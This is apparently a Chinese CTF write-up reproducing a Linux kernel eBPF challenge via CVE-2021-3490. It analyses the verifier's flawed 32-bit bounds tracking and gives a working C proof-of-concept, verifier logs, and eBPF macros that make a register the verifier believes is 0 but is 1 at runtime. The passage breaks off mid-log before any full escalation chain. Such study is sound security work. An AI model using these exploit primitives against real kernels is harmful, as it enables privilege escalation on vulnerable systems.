 * NOTE(review): the original note read "read start from len to offset, write
 * start from offset"; presumably offset/len delimit the valid data inside
 * `page` -- confirm against the kernel source.
 */
struct pipe_buffer {
struct page *page; /* page holding the data */
unsigned int offset, len; /* position and length of the data in the page */
const struct pipe_buf_operations *ops; /* callback table for this buffer */
unsigned int flags;
unsigned long private;
};

/*
 * Userspace re-declaration of the pipe buffer callback table: four function
 * pointers (confirm, release, try_steal, get). try_steal and get are declared
 * with an int return type in this copy.
 */
struct pipe_buf_operations {
/*
* ->confirm() verifies that the data in the pipe buffer is there
* and that the contents are good. If the pages in the pipe belong
* to a file system, we may need to wait for IO completion in this
* hook. Returns 0 for good, or a negative error value in case of
* error. If not present all pages are considered good.
*/
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* When the contents of this pipe buffer has been completely
* consumed by a reader, ->release() is called.
*/
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Attempt to take ownership of the pipe buffer and its contents.
* ->try_steal() returns %true for success, in which case the contents
* of the pipe (the buf->page) is locked and now completely owned by the
* caller. The page may then be transferred to a different mapping, the
* most often used case is insertion into different file address space
* cache.
*/
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

/*
* Get a reference to the pipe buffer.
*/
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif

ebpf-pwn-A-Love-Story 复现

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.3
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh

mount -t proc proc /proc
mount -t tmpfs none /tmp
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
echo "flag{yhellow}" > /flag
chmod 666 /flag

setsid /bin/cttyhack setuidgid 0 /bin/sh
echo 'sh end!\n'
#poweroff -d 1800000 -f &
umount /proc
umount /sys

poweroff -f

下载 5.11.16 的内核源码:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目没有内核模块,漏洞点为 CVE-2021-3490:

  • CVE-2021-3490 是一个发生在 eBPF verifier 中的漏洞,由于 eBPF verifier 在校验位运算操作( 与、或、异或 )时没有正确地更新寄存器的 32 位边界,从而导致攻击者可以构造出非法的运行时寄存器值以进行提权

在 eBPF 对寄存器计算的指令中,分为64位和32位操作两部分

  • 64位指令会对寄存器的64位全部进行操作
  • 32位指令只会对寄存器的低32位进行操作

eBPF 程序的安全主要是由 verifier 保证的,verifier 会模拟执行每一条指令并验证寄存器的值是否合法,主要关注这几个字段:

  • smin_value / smax_value:64 位有符号的值的可能取值边界
  • umin_value / umax_value:64 位无符号的值的可能取值边界
  • s32_min_value / s32_max_value:32 位有符号的值的可能取值边界
  • u32_min_value / u32_max_value:32 位无符号的值的可能取值边界

其中,这个寄存器中具体的值,会用如下结构体进行表示:

1
2
3
4
/*
 * "Tracked number": per-bit knowledge the verifier has about a register.
 * Example from the analysis: { .value = 0x1, .mask = 0xffffffff00000000 }
 * means the low 32 bits are known to be 0x1 and the high 32 bits are unknown.
 */
struct tnum {
u64 value; /* values of the bits that are known */
u64 mask; /* bits set here are unknown */
};
  • value 记录已确定比特位的值;mask 中为 1 的比特位表示该位的值未知(不确定)

用于检测指令合法性的函数为 do_check,该函数会遍历每一条指令并根据指令的不同类型进行不同操作,对于算术指令(BPF_ALU / BPF_ALU64)而言有如下调用链(模拟通过后才能正常加载)

1
2
3
4
do_check()        					// 遍历每一条指令并根据类型调用相应函数处理
->check_alu_op() // 根据算术指令的opcode进行不同处理
->adjust_reg_min_max_vals() // 计算新的寄存器边界值
->adjust_scalar_min_max_vals() // 根据opcode计算具体的新边界值

首先分析调整标量数据范围的 adjust_scalar_min_max_vals 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
/*
 * Excerpt (elided with "......") of the verifier routine that recomputes the
 * bounds of dst_reg for a scalar ALU operation. Only the AND / OR / XOR cases
 * relevant to the analysis are shown.
 */
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{

......

switch (opcode) {

......

case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg); /* 32-bit bounds (the vulnerable function) */
scalar_min_max_and(dst_reg, &src_reg); /* 64-bit bounds */
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;

......

default:
mark_reg_unknown(env, regs, insn->dst_reg);
break;
}

if (alu32)
zext_32_to_64(dst_reg);

__update_reg_bounds(dst_reg); /* tighten the bounds using var_off */
__reg_deduce_bounds(dst_reg); /* bounds adjustment / checking */
__reg_bound_offset(dst_reg); /* recompute var_off from the bounds range */
return 0;
}

CVE 的漏洞点位于 scalar32_min_max_and 以及与之对应的 scalar32_min_max_or、scalar32_min_max_xor:BPF_AND / BPF_OR / BPF_XOR 三类操作的 32 位边界更新都存在同样的问题(下面以 AND 为例)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * Quoted from the 5.11.16 verifier (vulnerable version): update the 32-bit
 * bounds of dst_reg for "dst_reg &= src_reg". dst_reg->var_off has already
 * been replaced by the AND result when this runs.
 */
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* Are the low 32 bits of src_reg / dst_reg fully known constants? */
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
/* 32-bit view of dst_reg->var_off, plus src_reg's signed-min and unsigned-max 32-bit bounds */
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;

/*
 * Both low halves known: return without touching the 32-bit bounds, on the
 * assumption that the 64-bit handler will set them. This early return is
 * the flaw discussed in the analysis.
 */
if (src_known && dst_known)
return;

/* Unsigned bounds: minimum from var32_off, maximum is the smaller operand maximum */
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
/* Either operand may be negative: drop the signed bounds to the full s32 range */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* Both non-negative: reuse the unsigned 32-bit bounds as signed bounds */
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
  • 在更新 32 位边界值时,如果两个寄存器的低 32 位都为 known 那就可以直接跳过,因为程序认为 64 位时还会进行更新
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/*
 * Quoted from the 5.11.16 verifier: update the 64-bit bounds of dst_reg for
 * "dst_reg &= src_reg". Unlike the 32-bit variant, "known" here means all 64
 * bits of var_off are constant.
 */
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
/* Are src_reg / dst_reg fully known 64-bit constants? */
bool src_known = tnum_is_const(src_reg->var_off);
bool dst_known = tnum_is_const(dst_reg->var_off);
/* src_reg's signed-min and unsigned-max 64-bit bounds */
s64 smin_val = src_reg->smin_value;
u64 umax_val = src_reg->umax_value;

/* Both fully known: mark dst_reg as the constant held in var_off and stop */
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}

/* We get our minimum from the var_off, since that's inherently
* bitwise. Our maximum is the minimum of the operands' maxima.
*/
dst_reg->umin_value = dst_reg->var_off.value;
dst_reg->umax_value = min(dst_reg->umax_value, umax_val);
if (dst_reg->smin_value < 0 || smin_val < 0) {
/* Lose signed bounds when ANDing negative numbers,
* ain't nobody got time for that.
*/
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
/* ANDing two positives gives a positive, so safe to
* cast result into s64.
*/
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg); /* tighten the bounds using var_off */
}
  • 在更新64位边界值时,若两个寄存器都为 known 就直接调用 __mark_reg_known(PS:64位和32位判断调用 __mark_reg_known 的条件不同,这也引发了漏洞)
  • __mark_reg_known 用于设置一个已经确定的寄存器:简单地调用 tnum_const 将寄存器的 var_off 设置为 known,并给对应边界赋值
1
2
3
4
5
6
7
/*
 * Mark `reg` as the known constant `imm`: zero the bytes between the `type`
 * field and `var_off`, then let ___mark_reg_known() set var_off and bounds.
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * Set var_off to the constant `imm` and collapse every bound to that value:
 * the 64-bit bounds to imm itself, the 32-bit bounds to imm truncated to
 * s32 / u32.
 */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;

reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}

在最后还会调用 __update_reg_bounds() 对比寄存器的 var_off 并更新边界值:

1
2
3
4
5
/* Refresh both the 32-bit and the 64-bit bounds of `reg` from its var_off. */
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Tighten the 32-bit bounds of `reg` using the low 32 bits of var_off.
 * Minimums are only ever raised (max) and maximums only ever lowered (min),
 * so already inconsistent bounds are not repaired here.
 */
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
/* unsigned min: at least the known bits */
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
/* unsigned max: at most the known bits with every unknown bit set */
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}
1
2
3
4
5
6
7
8
9
10
11
12
/*
 * Tighten the 64-bit bounds of `reg` using var_off. Minimums are only ever
 * raised (max) and maximums only ever lowered (min).
 */
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
/* unsigned min: at least the known bits */
reg->umin_value = max(reg->umin_value, reg->var_off.value);
/* unsigned max: at most the known bits with every unknown bit set */
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}
  • 计算方法如下:
    • 最小边界值 = [min_value , var_off.value | (var_off.mask & MIN) ] 中的最大者
    • 最大边界值 = [max_value , var_off.value | (var_off.mask & MAX) ] 中的最小者

但这样存在一个问题,若存在一个高32位 unknown 低32位 known 的寄存器:

  • 在理论上,程序执行时 scalar32_min_max_and 就能确定该寄存器的值,应该调用 __mark_reg_known 进行更新
  • 但程序认为在 scalar_min_max_and 中也能检查寄存器是否 known,因此选择在 scalar_min_max_and 中调用 __mark_reg_known,而 scalar32_min_max_and 中直接返回
  • 核心问题就是,函数 scalar32_min_max_and 与 scalar_min_max_and 中判断寄存器是否 known 的条件不同(前者只看低 32 位,后者看全部 64 位),导致原本应该执行 __mark_reg_known 的程序没有执行

如果有以下两个寄存器:

  • R2 = { .value = 0x1, .mask = 0xffffffff00000000 }:该寄存器低 32 位值已知为 0x1,高 32 位不确定
  • R3 = { .value = 0x100000002, .mask = 0x0 }:该寄存器 64 位值全部已知,为 0x100000002

假如我们将 R2 与 R3 做与运算,其结果为 { .value = 0, .mask = 0x100000000 },详细调用过程如下:

  • 首先执行 adjust_scalar_min_max_vals 函数,随后会进入 tnum_and 函数
    • 该函数返回 R2.var_off = {mask = 0x100000000; value=0x0}
    • 由于 R2 的高32位是不确定,导致 0x100000002 中高出32位的非“0”部分不确定,所以最终 R2.var_off.mask = 0x100000000(仅有第32位不确定)
  • 然后执行 scalar32_min_max_and 检查寄存器32位的值的范围
    • 这里由于 R2 和 R3 两个寄存器的低32位的值都是确定的,该函数直接返回
  • 接着执行 scalar_min_max_and 检查寄存器64位的值的范围
    • 由于 R2 寄存器第32位仍不确定,因此不会调用 __mark_reg_known
  • 在末尾调用 __update_reg_bounds,这个函数会对 R2 的值做相应修改:
    • 设置 R2.u32_max_value=0x0(取 min(R2.u32_max_value=1, var_off.value | var_off.mask 的低 32 位=0),结果为 0)
    • R2.u32_min_value 保持为 0x1(取 max(R2.u32_min_value=1, var_off.value 的低 32 位=0),结果为 1)
  • 最后执行 __reg_bound_offset 函数,也不会改变 R2 的属性

因此经过该轮计算之后 R2 的最小值为 1,最大值为 0,而这显然是不合理的

测试样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/sem.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/wait.h>
#include <semaphore.h>
#include <poll.h>
#include <sched.h>
#include <ctype.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

/*
 * eBPF instruction sequence that triggers the bounds bug:
 *   1. look up element 0 of the map (exit if the lookup fails);
 *   2. r2 = value with unknown high 32 bits and low 32 bits known to be 1;
 *   3. r3 = constant 0x100000002;
 *   4. r2 &= r3.
 * Every explanatory comment sits BEFORE the trailing backslash: a backslash
 * only continues the line when it is the last character on it.
 */
#define POC_PROG(__map_fd)                                                       \
    /* Load value from map */                                                    \
    BPF_LD_MAP_FD(BPF_REG_9, __map_fd),            /* r9 = map */                \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),           /* r1 = r9 */                 \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),          /* r2 = r10 (frame ptr) */    \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),         /* r2 += -8 */                \
    BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0),           /* *(u64 *)(r2 + 0) = 0 */    \
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),         \
    /* if success, r0 will be ptr to value, 0 for failed */                      \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),         /* if r0 != 0 goto pc+1 */    \
    BPF_EXIT_INSN(),                               /* exit */                    \
    /* load value into r2, make it part-unknown */                               \
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),  /* r2 = *(u64 *)(r0 + 0) */   \
    BPF_MOV64_IMM(BPF_REG_4, 0xffffffff),          /* r4 = -1 */                 \
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32),         /* r4 <<= 32 */               \
    BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_4),  /* r2 &= r4 */                \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x1),        /* r2 += 1 */                 \
    /* r3 = 0x100000002 */                                                       \
    BPF_MOV64_IMM(BPF_REG_3, 0x1),                 /* r3 = 1 */                  \
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32),         /* r3 <<= 32 */               \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2),        /* r3 += 2 */                 \
    /* trigger the vulnerability */                                              \
    BPF_ALU64_REG(BPF_AND, BPF_REG_2, BPF_REG_3)   /* r2 &= r3 */


/*
 * PoC driver: create an array map with 4-byte keys and MAP_SIZE-byte values,
 * store an all-zero value at key 0, then load and run POC_PROG so the
 * verifier log shows the inconsistent 32-bit bounds.
 */
int main(int argc , char **argv, char **envp)
{
    /*
     * One full map value, zero-filled. The update below copies MAP_SIZE bytes
     * from this buffer, so all of it must be initialized, not just value[0].
     */
    size_t value[MAP_SIZE / sizeof(size_t)] = { 0 };
    int map_fd;
    int key = 0;

    map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
    if (map_fd < 0) {
        err_exit("FAILED to create eBPF map!");
    }

    if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
        err_exit("FAILED to load value into map!");
    }

    struct bpf_insn prog[] = {
        POC_PROG(map_fd),
        BPF_EXIT_INSN()
    };
    run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 2, 1);

    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/ $ ./exp
func#0 @0
0: R1=ctx(id=0,off=0,imm=0) R10=fp0
0: (18) r9 = 0x0
2: R1=ctx(id=0,off=0,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
2: (bf) r1 = r9
4: (07) r2 += -8
2: (bf) r1 = r9
3: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
3: (bf) r2 = r10
4: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
4: (07) r2 += -8
5: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0
5: (7a) *(u64 *)(r2 +0) = 0
6: R1_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=fp-8 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
6: (85) call bpf_map_lookup_elem#1
7: R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8192,imm=0) R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
7: (55) if r0 != 0x0 goto pc+1
R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: R0_w=invP0 R9_w=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8_w=mmmmmmmm
8: (95) exit
9: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
9: (79) r2 = *(u64 *)(r0 +0)
R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
10: (b7) r4 = -1
11: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-1 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
11: (67) r4 <<= 32 /* r4=0xffffffff00000000 */
12: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
12: (5f) r2 &= r4 /* 取r2的高32位 */
13: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smax_value=9223372032559808512,umax_value=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min_value=0,s32_max_value=0,u32_max_val
ue=0) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
13: (07) r2 += 1
14: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000) */
14: (b7) r3 = 1
15: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP1 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
15: (67) r3 <<= 32
16: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967296 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
16: (07) r3 += 2 /* r3=0x100000002 */
17: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,smin_value=-9223372036854775807,smax_value=9223372032559808513,umin_value=1,umax_value=18446744069414584321,var_off=(0x1; 0xffffffff00000000
),s32_min_value=1,s32_max_value=1,u32_max_value=1) R3_w=invP4294967298 R4_w=invP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r2={s32_min_value=1,s32_max_value=1},var_off=(0x1; 0xffffffff00000000)
r3=0x100000002,var_off=(0x100000002; 0x0) */
17: (5f) r2 &= r3
18: R0=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R2_w=invP(id=0,umax_value=4294967296,var_off=(0x0; 0x100000000),s32_min_value=1,s32_max_value=0,u32_min_value=1,u32_max_value=0) R3_w=invP4294967298 R4_w=i
nvP-4294967296 R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* 注意r2中{s32_min_value=1,s32_max_value=0},证明漏洞已经生效 */
18: (95) exit
R0 leaks addr as return value
processed 18 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

入侵思路

核心思路参考:[漏洞分析] 【CVE-2021-3490】eBPF verifier 32 位边界计算错误漏洞分析与利用 (buaq.net)

利用漏洞构造一个最小边界值为 “1”、最大边界值为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#define VULN_REG    BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)
  • 因为 R1~R5 有的时候要用来作为函数参数,所以这里在 R6 上构造
  • 此时 R6 32 位边界值为 [1, 0] ,32位运行时值为 0

构造运行时为 “1” 但 verifier 确信为 “0” 的寄存器:

1
2
3
4
5
6
7
8
9
10
11
#define MAKE_VULN_REG(__map_fd)                         \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)
  • 构造出另一个 32 位边界值为 [0, 1] ,32位运行时值为 0 寄存器 R7
  • 把寄存器 R6 和 R7 相加,得到新的 R6,边界值为 [1, 1] ,32位运行时值为 0,于是便获得了一个运行时为 “0” 但 verifier 认为是 “1” 的寄存器
  • 如果我们再给 R6 加上 1 ,从而使得边界值为 [2, 2] ,但实际上的 32 位值为 1
  • 再将 R6 与 1 做 & 运算,从而使得边界值为 [0, 0] ,但实际上的 32 位值为 1
  • 最终 verifier 便会认为该寄存器的值变为 “0”,但其实际上的运行时值为 “1”
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
36: (07) r6 += 1
37: R0_w=invP0 R6_w=invP(id=0,smin_value=-9223372036854775806,smax_value=9223372
032559808514,umin_value=2,umax_value=18446744069414584322,var_off=(0x2; 0xffffff
ff00000000),s32_min_value=2,s32_max_value=2,u32_max_value=2) R7_w=invP(id=0,smax
_value=9223372032559808513,umax_value=18446744069414584321,var_off=(0x0; 0xfffff
fff00000001),s32_min_value=0,s32_max_value=1,u32_max_value=1) R8_w=map_value(id=
0,off=0,ks=4,vs=8192,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp
-8=mmmmmmmm
/* r6={s32_min_value=2,s32_max_value=2},var_off=(0x2; 0xffffffff00000000) */
37: (57) r6 &= 1
38: R0_w=invP0 R6_w=invP0 R7_w=invP(id=0,smax_value=9223372032559808513,umax_val
ue=18446744069414584321,var_off=(0x0; 0xffffffff00000001),s32_min_value=0,s32_ma
x_value=1,u32_max_value=1) R8_w=map_value(id=0,off=0,ks=4,vs=8192,imm=0) R9=map_
